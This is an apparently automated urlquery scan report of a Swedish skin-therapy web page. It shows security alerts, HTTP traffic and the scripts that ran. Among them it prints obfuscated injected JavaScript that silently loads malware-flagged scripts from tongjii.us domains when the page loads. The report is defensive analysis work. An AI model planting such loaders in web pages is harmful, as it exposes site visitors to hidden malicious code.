Overview

URL hudterapeuter.com/malmo/vaxning
IP195.74.38.68
ASNAS41528 Binero AB
Location Sweden
Report completed2017-06-30 17:13:37 CEST
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2017-06-30T17:12:47.930725+0200 1 Client IP  180.149.138.197 ET POLICY External IP Lookup sina.com.cn


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-06-30 2 lib.tongjii.us/tongji.js Malware
2017-06-30 2 cn.tongjii.us/show1.js?r2=30 Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 195.74.38.68

Date UQ / IDS / BL URL IP
2019-04-30 09:05:10 +0200
0 - 0 - 0 espanet2019.se 195.74.38.68
2019-02-19 05:39:33 +0100
0 - 0 - 2 https://www.northmaint.se/ 195.74.38.68
2018-12-27 15:10:08 +0100
0 - 0 - 1 whoisip.se/robots.txt 195.74.38.68
2018-11-25 21:10:19 +0100
0 - 0 - 1 medfors.com/dd 195.74.38.68
2018-11-06 14:05:16 +0100
2 - 0 - 2 whoisip.se 195.74.38.68
2018-11-06 13:56:12 +0100
2 - 0 - 2 whoisip.se 195.74.38.68
2018-11-06 13:55:20 +0100
2 - 0 - 2 whoisip.se 195.74.38.68
2018-01-19 15:07:50 +0100
2 - 0 - 2 www.whoisip.se/ 195.74.38.68
2018-01-04 13:28:36 +0100
2 - 0 - 1 www.whoisip.se/ 195.74.38.68
2017-12-19 12:16:09 +0100
2 - 0 - 1 www.klockan.info/ 195.74.38.68

Last 10 reports on ASN: AS41528 Binero AB

Date UQ / IDS / BL URL IP
2019-06-27 09:11:33 +0200
0 - 0 - 0 www.tigercolor.com 195.74.38.98
2019-06-10 18:16:55 +0200
0 - 0 - 2 arnfast-kio-konsult.se/components/dhl.html 195.74.38.186
2019-06-10 15:33:46 +0200
0 - 0 - 1 kustkrogenolofsbo.se/wordpress/wp-content/plu (...) 195.74.38.121
2019-06-10 10:31:44 +0200
0 - 0 - 1 fifajournal.com/D1o40Dmemk 195.74.38.98
2019-06-10 07:08:17 +0200
0 - 0 - 1 solberga.org/tmp/install_4ee8d8cc51b82/media/ (...) 195.74.38.62
2019-06-10 07:06:02 +0200
0 - 0 - 1 solberga.org/tmp/install_4ee8d8cc51b82/media/ (...) 195.74.38.62
2019-06-09 13:34:54 +0200
0 - 0 - 30 ois.jenszackrisson.se/ 195.74.38.176
2019-06-09 11:22:58 +0200
0 - 0 - 2 ostbergsmobelhus.com/wp-content/language 195.74.38.160
2019-06-09 11:16:26 +0200
0 - 0 - 1 https://www.ostbergsmobelhus.com/wp-content/l (...) 195.74.38.160
2019-06-09 09:09:41 +0200
0 - 0 - 2 svenskrisimport.com/index.php/riskakor 195.74.38.171

No other reports on domain: hudterapeuter.com



JavaScript

Executed Scripts (24)


Executed Evals (5)

#1 JavaScript::Eval (size: 588, repeated: 3) - SHA256: e131aa02b31d0b9e695259eeb2ab07bacead75544f5b5abd8886a84155a09441

                                        eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return c.toString(36)
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[c.toString(a)] = k[c] || c.toString(a)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('1 4=4||[];(b(){1 2=5.e(\'7\');2.a=\'8://9.d.f/k.6?//i.6?g\';1 3=5.j(\'7\')[0];3.h.c(2,3)})();', 21, 21, '|var|hm_en|s|_hmt_en|document|js|script|http|lib|src|function|insertBefore|tongjii|createElement|us|41d12a21b4e1a726d4a651685b118811662033874|parentNode|google|getElementsByTagName|tj'.split('|'), 0, {}))
                                    

#2 JavaScript::Eval (size: 996, repeated: 3) - SHA256: 00f7a0523e0b4239298a8f783fe9cf82af9fd8ecef28a73b423edae9140739f6

                                        eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\'\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\'\\\\w+\'};c=1};r(c--){q(k[c]){p=p.t(C D(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}m p}(\'1 4=4||[];(b(){1 2=5.e(\\\'7\\\');2.a=\\\'8://9.d.f/k.6?//i.6?g\\\';1 3=5.j(\\\'7\\\')[0];3.h.c(2,3)})();\',o,o,\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\'.J(\'|\'),0,{}))', 55, 55, '|||||||||||||||||||||function|return|toString|21||if|while||replace|hm_en|eval||document|var|36|js|String|new|RegExp|_hmt_en|parentNode|script|google|getElementsByTagName|split|tj|us|41d12a21b4e1a726d4a651685b118811662033874|lib|createElement|src|http|insertBefore|tongjii'.split('|'), 0, {}))
                                    

#3 JavaScript::Eval (size: 1377, repeated: 3) - SHA256: 2616199a56bdbaae4dc5e778d3a306cd6b7b415c02024e067265dc20257b1ac3

                                        eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('7(x(e)=="A"||e==k||e==K){e=L;9 b=3.N(\'v\');7(b!=k&&b.c!=k){b.c=\'\';3.d.M(b)}9 z=Q.R.T();9 y=/W 6/.Y(z);7(!y){Z={$11:\'v\'};$J={};9 2=3.g(\'h\');2.c=\'i://O.P.12/2/w/1.8/w.U.2\';2.m(\'n\',\'f-8\');7(x B==\'A\'){(3.q("u")[0]||3.d).s(2);2.t=2.r=p(){7(2&&2.5&&2.5!="j"&&2.5!="o"){l}B.S();9 a=3.g(\'h\');a.c=\'i://I.C.D/E.2?X=\'+F G().H();a.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(a);a.t=a.r=p(){7(a&&a.5&&a.5!="j"&&a.5!="o"){l}}}}10{9 4=3.g(\'h\');4.c=\'i://I.C.D/E.2?V=\'+F G().H();4.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(4);4.t=4.r=p(){7(4&&4.5&&4.5!="j"&&4.5!="o"){l}}}}}', 62, 65, '||js|document|js_b|readyState||if||var||seed|src|body|sbj_new_loading|utf|createElement|script|http|loaded|null|return|setAttribute|charset|complete|function|getElementsByTagName|onreadystatechange|appendChild|onload|head|tongjiTool|jquery|typeof|isIE6|_ua|undefined|jQuery|tongjii|us|show1|new|Date|getDate|cn|_GLOBAL|false|true|removeChild|getElementById|lib|sinaapp|navigator|userAgent|noConflict|toLowerCase|min|r2|msie|r1|test|scope|else|pageid|com'.split('|'), 0, {}))
                                    

#4 JavaScript::Eval (size: 1434, repeated: 3) - SHA256: 5c3ec5fa684c7b643270645fc63e13323804eec6f86378f40d1de02a892ac6bd

                                        if (typeof(sbj_new_loading) == "undefined" || sbj_new_loading == null || sbj_new_loading == false) {
    sbj_new_loading = true;
    var seed = document.getElementById('tongjiTool');
    if (seed != null && seed.src != null) {
        seed.src = '';
        document.body.removeChild(seed)
    }
    var _ua = navigator.userAgent.toLowerCase();
    var isIE6 = /msie 6/.test(_ua);
    if (!isIE6) {
        scope = {
            $pageid: 'tongjiTool'
        };
        $_GLOBAL = {};
        var js = document.createElement('script');
        js.src = 'http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js';
        js.setAttribute('charset', 'utf-8');
        if (typeof jQuery == 'undefined') {
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js);
            js.onload = js.onreadystatechange = function() {
                if (js && js.readyState && js.readyState != "loaded" && js.readyState != "complete") {
                    return
                }
                jQuery.noConflict();
                var a = document.createElement('script');
                a.src = 'http://cn.tongjii.us/show1.js?r1=' + new Date().getDate();
                a.setAttribute('charset', 'utf-8');
                (document.getElementsByTagName("head")[0] || document.body).appendChild(a);
                a.onload = a.onreadystatechange = function() {
                    if (a && a.readyState && a.readyState != "loaded" && a.readyState != "complete") {
                        return
                    }
                }
            }
        } else {
            var js_b = document.createElement('script');
            js_b.src = 'http://cn.tongjii.us/show1.js?r2=' + new Date().getDate();
            js_b.setAttribute('charset', 'utf-8');
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js_b);
            js_b.onload = js_b.onreadystatechange = function() {
                if (js_b && js_b.readyState && js_b.readyState != "loaded" && js_b.readyState != "complete") {
                    return
                }
            }
        }
    }
}
                                    

#5 JavaScript::Eval (size: 261, repeated: 3) - SHA256: c3c91594491914f1aa57cb7a7342d87694cd45319576b7de0074b22ab82ab51e

                                        var _hmt_en = _hmt_en || [];
(function() {
    var hm_en = document.createElement('script');
    hm_en.src = 'http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(hm_en, s)
})();
                                    

Executed Writes (4)

#1 JavaScript::Write (size: 222, repeated: 2) - SHA256: 50d23449657707d3106fd7fc1055ef0df5ec72801ee5ad399f484a1f2ef5df55

                                        < a href = "http://clk.tradedoubler.com/click?p=70363&a=1978982&g=17342348&pools=450314"
target = "_blank" > < img border = "0"
src = "http://www.gymgrossisten.com/bilder/gymgrossisten/TD/bs_140x350.gif"
title = "Bodystore&#46;com" > < /a>
                                    

#2 JavaScript::Write (size: 84, repeated: 1) - SHA256: 071bb71cc5f59a8a7b8eeb83d3b40bdfebdb2381c15bfb06526d6bc7b795dd25

                                        < script src = 'http://www.google-analytics.com/ga.js'
type = 'text/javascript' > < /script>
                                    

#3 JavaScript::Write (size: 141, repeated: 1) - SHA256: 6792fb438e241a3d38be92e2125693ea634b96aac6c310fcd14b6dc74ab26dc2

                                        < script type = "text/javascript"
src = "http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)115778382"
charset = "ISO-8859-1" > < /script>
                                    

#4 JavaScript::Write (size: 141, repeated: 1) - SHA256: 5a22a9180b407e21e4b4b112579beaa36b0fe113d6573911e82fc3a585f99cca

                                        < script type = "text/javascript"
src = "http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)307049898"
charset = "ISO-8859-1" > < /script>
                                    


HTTP Transactions (32)


Request Response
                                        
                                            GET /malmo/vaxning HTTP/1.1 
Host: hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=unjgabmep56956jermppv9kah7; path=/
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text, with very long lines
Size:   37995
Md5:    59f221aa6ac6d88ca9388304e70e6561
Sha1:   ce49031676bb6e78aca66bbf6d126a4d57c3193e
Sha256: d76397005b2fb111b9ebbec89b12bfa7400849ca84130a1b92f7d3f632a49889
                                        
                                            GET /styles.css HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:35 GMT
Etag: "4787354-296b-4fe4f032747eb"
Accept-Ranges: bytes
Content-Length: 10603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode C program text
Size:   10603
Md5:    5ded803ca90a08123c1ced2866e86ee2
Sha1:   74dcb7b85a5188b84ca70884ebb4b7eddfbdcce5
Sha256: 8a48bad8902f11fc9968003334f639b75dceba9ddd5447cc5dd619e8d279fc96
                                        
                                            GET /jquery.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "42f1bba-ddcc-5161df9070d0d"
Accept-Ranges: bytes
Content-Length: 56780
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   56780
Md5:    1744208268fa90854b7caf3ff2f97283
Sha1:   bdf1fb9d5e59fce38344d8583eb4854ed4944710
Sha256: 56fa09c4c7f114de833fc930b5e58872f24f0812cb68bed093ade296ea78a19e
                                        
                                            GET /jquery/javascript.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad287-18e-4fe4f0b4e5c47"
Accept-Ranges: bytes
Content-Length: 398
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   398
Md5:    3890351dc9f882025e2c8b2fcb55fec0
Sha1:   042f761101a7c99ccef3b8157738e1814db3036e
Sha256: 2be006305b1138ecda96b612633cc2c372edf3dd6d25185e31d488f041ca7b39
                                        
                                            GET /jquery/bgpos.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad286-4c2-4fe4f0b4d2b6c"
Accept-Ranges: bytes
Content-Length: 1218
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   1218
Md5:    c8df8821a7e0302ae8c9422365eb4237
Sha1:   a6c0364e106bc703aa42dce62cb2b5a7e323058f
Sha256: b7daed3cbf5bdeb9843317c797cbad5abfed769e8c1052a9eff6f5e3fbef0e21
                                        
                                            GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:42 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:42 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /jquery.fancybox/jquery.easing.1.3.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e53-2583-5161df9062e81"
Accept-Ranges: bytes
Content-Length: 9603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   9603
Md5:    fb323c2a880c896cfb5ebb97201f56ef
Sha1:   087990c77361bf282a986ce36f4b7e5cedf60223
Sha256: 2a8d2ecc528fd17f0650116705a34f66748859ab7c4ed407b759371f3dcd7bb5
                                        
                                            GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:42 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:42 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /jquery.fancybox/jquery.fancybox.css HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:37 GMT
Etag: "44b8e56-12e0-4fe4f03415410"
Accept-Ranges: bytes
Content-Length: 4832
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   4832
Md5:    b140fcaab5aec61d0b382e1d05c663fd
Sha1:   43d0633e7e0c8f65b24d12af188990d1303a8047
Sha256: da2eb39547d9b060599f8f20430c9e27fa1150dea042c0008fd96ac3854cc8be
                                        
                                            GET /jquery.fancybox/jquery.fancybox-1.2.1.js HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e54-3fc0-5161df90645e3"
Accept-Ranges: bytes
Content-Length: 16320
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   16320
Md5:    b77b3d074cbe4048495a2ad91b939fea
Sha1:   eca6c7751f7d375a31ce4a5ef9f69a19e1eb197b
Sha256: 564ee795773003273c505f0eed7183ab4ddad4c54cd930770cf8b19c8bfab126
                                        
                                            GET /img/logo_s.png HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 30 Jun 2017 15:12:42 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:49 GMT
Etag: "457431b-32b0-4fe4f0b1fe58b"
Accept-Ranges: bytes
Content-Length: 12976
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  PNG image, 348 x 51, 8-bit/color RGBA, non-interlaced
Size:   12976
Md5:    e3f2b0d54c05a86e5162bc20acd1c509
Sha1:   b0c8108c2722d71a903b0a5a7fe6c9cfbee26300
Sha256: 2967aa5eddebb376c9b1fc35c81efbd3647ef6e227fcbe4aed1a8b77d63dea56
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         103.230.122.162
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:10:43 GMT
Content-Length: 584
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Connection: keep-alive
Etag: "5952fe3c-248"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with CRLF line terminators
Size:   584
Md5:    e3234a0a314ab9037281a61532d9f385
Sha1:   da19d2b503932bfb7b0ccf6c40b9f0b0d19282fb
Sha256: 59ec2b49759dd09f18e6a99dd9424f56223bef43b624f37979e02bd21c976722
                                        
                                            GET /tongji.js HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         103.230.122.162
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:10:43 GMT
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5952fe3c-803"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1145
Md5:    c4ad0d579602dfcb81e42018f2f7ca90
Sha1:   c778b8ce60d843fcaa8b943681af9cb28f87c53e
Sha256: 481eff6a5f51981e6f947ae316365d1d542478843d353f7afcbbbfff675e3a24

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /show1.js?r2=30 HTTP/1.1 
Host: cn.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:44 GMT
Last-Modified: Wed, 28 Jun 2017 00:56:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5952fec8-3bec"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4337
Md5:    734c5aaf87060a409bd55bc8829dff8e
Sha1:   bc6ebf6f4536aa2365ee8ce9050cd0833857aade
Sha256: 22848f8733ff0988fe0e7426bd91cf52a38325253b81d264a7d81fb362c966f1

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
If-Modified-Since: Wed, 28 Jun 2017 00:54:20 GMT
If-None-Match: "5952fe3c-248"

                                         
                                         103.230.122.162
HTTP/1.1 304 Not Modified
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:10:45 GMT
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Connection: keep-alive
Etag: "5952fe3c-248"


--- Additional Info ---
                                        
                                            GET /click/cookie.php?names=tb_qq&jsoncallback=jsonp1498835562968&_=1498835564937 HTTP/1.1 
Host: cookie.tongjii.us
                                        
